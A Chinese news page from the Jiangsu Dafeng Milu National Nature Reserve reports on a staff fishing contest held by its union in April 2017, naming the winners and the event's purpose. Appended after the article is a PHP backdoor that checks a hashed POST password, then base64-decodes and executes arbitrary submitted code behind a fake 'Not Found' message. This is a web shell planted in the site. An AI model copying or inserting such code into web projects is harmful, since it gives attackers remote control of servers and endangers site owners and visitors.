最新要闻

首页 > 最新要闻 >

    江苏省大丰麋鹿国家级自然保护区工会委员会举办职工钓鱼比赛

              2017年4月27,江苏省大丰麋鹿国家级自然保护区工会委员会举办了职工钓鱼比赛。来自保护区的20余职工参加了比赛。

     

    参赛选手们早早来到比赛地点,选好钓位的选手,已做好了挥杆垂钓前的准备。1630分比赛正式开始。摆钓竿、打窝子、调浮漂、投饵料、静等待,人人施展浑身解数,个个忙得不易乐乎。有鱼儿上钩,钓者、观者共享其乐,欢声笑语萦绕湖畔。经过个小时的激烈角逐, 陈林拔得单尾重量头筹许国新、杨卫、陈林拔得总重量前三名。

     

    保护区工会委员会举办职工钓鱼比赛,旨在让大家在垂“钓”出一份好心情,进一步增进交流,陶冶情操, 快乐生活,愉快工作,用饱满的激情迎接每一天,在工作岗位上再创新佳绩。

     

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>